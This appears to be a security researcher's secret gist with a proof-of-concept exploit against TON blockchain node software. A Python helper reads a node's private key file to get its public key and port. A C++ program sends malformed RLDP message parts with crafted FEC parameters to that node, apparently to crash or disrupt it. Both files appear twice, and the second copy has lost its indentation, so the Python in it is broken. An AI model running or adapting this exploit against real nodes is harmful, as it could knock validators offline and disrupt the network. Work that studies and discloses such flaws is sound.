this-is-chainlight/get_connection_info.py Secret

## get_connection_info.py
#!/usr/bin/python3
# pip install pynacl

from nacl.signing import SigningKey
from nacl.encoding import HexEncoder
import codecs
import json

config = json.load(open("/var/ton-work/db/config.json", "r"))
port = None
for addr in config['addrs']:
    if addr['@type'] == 'engine.addr':
        port = addr['port']
        break
key_id = None
for adnl in config['adnl']:
    if adnl['category'] == 1:
        key_id = bytes(adnl['id'], 'ascii')
        break
key_id = codecs.encode(codecs.decode(key_id, 'base64'), 'hex').upper()
priv_key = open(b'/var/ton-work/db/keyring/' + key_id, 'rb').read()[4:]
sk = SigningKey(priv_key)
vk = sk.verify_key

print('PUBKEY', str(vk.encode(HexEncoder()), 'ascii'))
print('PORT', port)

## test-exploit.cpp
// Add lines below to CMakeLists.txt
// add_executable(test-exploit test/test-exploit.cpp)
// target_link_libraries(test-exploit adnl dht rldp fec tl_api)

#include "adnl/adnl-network-manager.h"
#include "adnl/adnl.h"
#include "rldp/rldp.h"
#include "fec/fec.h"

#include "auto/tl/ton_api.hpp"

#include "td/utils/port/signals.h"
#include "td/utils/port/path.h"
#include "td/utils/Random.h"

#include <memory>
#include <set>

int main() {
  SET_VERBOSITY_LEVEL(verbosity_DEBUG);
  td::set_default_failure_signal_handler().ensure();

  td::actor::ActorOwn<ton::keyring::Keyring> keyring;
  td::actor::ActorOwn<ton::adnl::AdnlNetworkManager> network_manager;
  td::actor::ActorOwn<ton::adnl::Adnl> adnl;

  ton::adnl::AdnlNodeIdShort src;
  ton::adnl::AdnlNodeIdShort dst;

  td::actor::Scheduler scheduler({1});

  scheduler.run_in_context([&] {
    keyring = ton::keyring::Keyring::create("");
    adnl = ton::adnl::Adnl::create("", keyring.get());
    network_manager = ton::adnl::AdnlNetworkManager::create(31337);
    td::actor::send_closure(adnl, &ton::adnl::Adnl::register_network_manager, network_manager.get());

    ton::adnl::AdnlCategoryMask cat_mask;
    cat_mask[0] = true;
    td::IPAddress addr;
    addr.init_host_port("127.0.0.1", 31337).ensure();
    td::actor::send_closure(network_manager, &ton::adnl::AdnlNetworkManager::add_self_addr, addr, std::move(cat_mask), 0);

    ton::adnl::AdnlAddressList addr_list;
    addr_list.set_version(static_cast<td::int32>(td::Clocks::system()));
    {
      auto pk = ton::PrivateKey{ton::privkeys::Ed25519::random()};
      auto pub = pk.compute_public_key();
      td::actor::send_closure(keyring, &ton::keyring::Keyring::add_key, std::move(pk), true, [](td::Unit) {});
      src = ton::adnl::AdnlNodeIdShort{pub.compute_short_id()};
      td::actor::send_closure(adnl, &ton::adnl::Adnl::add_id, ton::adnl::AdnlNodeIdFull{pub}, addr_list, static_cast<td::uint8>(0));
    }
    {
      auto pub_bits = td::Bits256();
      // EDIT THIS (PUBKEY)
      pub_bits.from_hex("0eb2156c9b2be5812ce3f78e003d08156545e251f232ea7e514ae8ec702b0ba2");
      auto pub = ton::PublicKey{ton::pubkeys::Ed25519(pub_bits)};
      dst = ton::adnl::AdnlNodeIdShort{pub.compute_short_id()};

      td::IPAddress addr;
      addr.init_host_port(
        "127.127.127.127",
        // EDIT THIS (PORT)
        11174
      ).ensure();
      ton::adnl::AdnlAddress x = ton::adnl::AdnlAddressImpl::create(ton::create_tl_object<ton::ton_api::adnl_address_udp>(addr.get_ipv4(), addr.get_port()));
      addr_list.add_addr(std::move(x));
      addr_list.set_version(static_cast<td::int32>(td::Clocks::system()));

      td::actor::send_closure(adnl, &ton::adnl::Adnl::add_peer, src, ton::adnl::AdnlNodeIdFull{pub}, addr_list);
    }
  });

  scheduler.run_in_context([&] {
    td::Bits256 transfer_id;
    td::Random::secure_bytes(transfer_id.as_slice());

    ton::fec::FecType fec_type = td::fec::RoundRobinEncoder::Parameters{
        // data_size
        0,
        // symbol_size
        1,
        // symbols_count
        0x1000
    };
    td::BufferSlice d1{"1"};
    d1.truncate(1);
    auto obj1 = ton::create_tl_object<ton::ton_api::rldp_messagePart>(
        // part.transfer_id_
        transfer_id,
        // part.fec_type_
        fec_type.tl(),
        // part.part_
        0,
        // part.total_size_
        1024,
        // seqno
        0,
        // std::move(symbol.data)
        std::move(d1)
    );
    td::actor::send_closure(adnl, &ton::adnl::Adnl::send_message, src, dst, serialize_tl_object(obj1, true));
    td::BufferSlice d2{"2"};
    d2.truncate(1);
    auto obj2 = ton::create_tl_object<ton::ton_api::rldp_messagePart>(
        // part.transfer_id_
        transfer_id,
        // part.fec_type_
        fec_type.tl(),
        // part.part_
        1,
        // part.total_size_
        1024,
        // seqno
        1,
        // std::move(symbol.data)
        std::move(d2)
    );
    td::actor::send_closure(adnl, &ton::adnl::Adnl::send_message, src, dst, serialize_tl_object(obj2, true));
  });
  scheduler.run();

  std::_Exit(0);
  return 0;
}
	#!/usr/bin/python3
	# pip install pynacl

	from nacl.signing import SigningKey
	from nacl.encoding import HexEncoder
	import codecs
	import json

	config = json.load(open("/var/ton-work/db/config.json", "r"))
	port = None
	for addr in config['addrs']:
	if addr['@type'] == 'engine.addr':
	port = addr['port']
	break
	key_id = None
	for adnl in config['adnl']:
	if adnl['category'] == 1:
	key_id = bytes(adnl['id'], 'ascii')
	break
	key_id = codecs.encode(codecs.decode(key_id, 'base64'), 'hex').upper()
	priv_key = open(b'/var/ton-work/db/keyring/' + key_id, 'rb').read()[4:]
	sk = SigningKey(priv_key)
	vk = sk.verify_key

	print('PUBKEY', str(vk.encode(HexEncoder()), 'ascii'))
	print('PORT', port)
	// Add lines below to CMakeLists.txt
	// add_executable(test-exploit test/test-exploit.cpp)
	// target_link_libraries(test-exploit adnl dht rldp fec tl_api)

	#include "adnl/adnl-network-manager.h"
	#include "adnl/adnl.h"
	#include "rldp/rldp.h"
	#include "fec/fec.h"

	#include "auto/tl/ton_api.hpp"

	#include "td/utils/port/signals.h"
	#include "td/utils/port/path.h"
	#include "td/utils/Random.h"

	#include <memory>
	#include <set>

	int main() {
	SET_VERBOSITY_LEVEL(verbosity_DEBUG);
	td::set_default_failure_signal_handler().ensure();

	td::actor::ActorOwn<ton::keyring::Keyring> keyring;
	td::actor::ActorOwn<ton::adnl::AdnlNetworkManager> network_manager;
	td::actor::ActorOwn<ton::adnl::Adnl> adnl;

	ton::adnl::AdnlNodeIdShort src;
	ton::adnl::AdnlNodeIdShort dst;

	td::actor::Scheduler scheduler({1});

	scheduler.run_in_context([&] {
	keyring = ton::keyring::Keyring::create("");
	adnl = ton::adnl::Adnl::create("", keyring.get());
	network_manager = ton::adnl::AdnlNetworkManager::create(31337);
	td::actor::send_closure(adnl, &ton::adnl::Adnl::register_network_manager, network_manager.get());

	ton::adnl::AdnlCategoryMask cat_mask;
	cat_mask[0] = true;
	td::IPAddress addr;
	addr.init_host_port("127.0.0.1", 31337).ensure();
	td::actor::send_closure(network_manager, &ton::adnl::AdnlNetworkManager::add_self_addr, addr, std::move(cat_mask), 0);

	ton::adnl::AdnlAddressList addr_list;
	addr_list.set_version(static_cast<td::int32>(td::Clocks::system()));
	{
	auto pk = ton::PrivateKey{ton::privkeys::Ed25519::random()};
	auto pub = pk.compute_public_key();
	td::actor::send_closure(keyring, &ton::keyring::Keyring::add_key, std::move(pk), true, [](td::Unit) {});
	src = ton::adnl::AdnlNodeIdShort{pub.compute_short_id()};
	td::actor::send_closure(adnl, &ton::adnl::Adnl::add_id, ton::adnl::AdnlNodeIdFull{pub}, addr_list, static_cast<td::uint8>(0));
	}
	{
	auto pub_bits = td::Bits256();
	// EDIT THIS (PUBKEY)
	pub_bits.from_hex("0eb2156c9b2be5812ce3f78e003d08156545e251f232ea7e514ae8ec702b0ba2");
	auto pub = ton::PublicKey{ton::pubkeys::Ed25519(pub_bits)};
	dst = ton::adnl::AdnlNodeIdShort{pub.compute_short_id()};

	td::IPAddress addr;
	addr.init_host_port(
	"127.127.127.127",
	// EDIT THIS (PORT)
	11174
	).ensure();
	ton::adnl::AdnlAddress x = ton::adnl::AdnlAddressImpl::create(ton::create_tl_object<ton::ton_api::adnl_address_udp>(addr.get_ipv4(), addr.get_port()));
	addr_list.add_addr(std::move(x));
	addr_list.set_version(static_cast<td::int32>(td::Clocks::system()));

	td::actor::send_closure(adnl, &ton::adnl::Adnl::add_peer, src, ton::adnl::AdnlNodeIdFull{pub}, addr_list);
	}
	});

	scheduler.run_in_context([&] {
	td::Bits256 transfer_id;
	td::Random::secure_bytes(transfer_id.as_slice());

	ton::fec::FecType fec_type = td::fec::RoundRobinEncoder::Parameters{
	// data_size
	0,
	// symbol_size
	1,
	// symbols_count
	0x1000
	};
	td::BufferSlice d1{"1"};
	d1.truncate(1);
	auto obj1 = ton::create_tl_object<ton::ton_api::rldp_messagePart>(
	// part.transfer_id_
	transfer_id,
	// part.fec_type_
	fec_type.tl(),
	// part.part_
	0,
	// part.total_size_
	1024,
	// seqno
	0,
	// std::move(symbol.data)
	std::move(d1)
	);
	td::actor::send_closure(adnl, &ton::adnl::Adnl::send_message, src, dst, serialize_tl_object(obj1, true));
	td::BufferSlice d2{"2"};
	d2.truncate(1);
	auto obj2 = ton::create_tl_object<ton::ton_api::rldp_messagePart>(
	// part.transfer_id_
	transfer_id,
	// part.fec_type_
	fec_type.tl(),
	// part.part_
	1,
	// part.total_size_
	1024,
	// seqno
	1,
	// std::move(symbol.data)
	std::move(d2)
	);
	td::actor::send_closure(adnl, &ton::adnl::Adnl::send_message, src, dst, serialize_tl_object(obj2, true));
	});
	scheduler.run();

	std::_Exit(0);
	return 0;
	}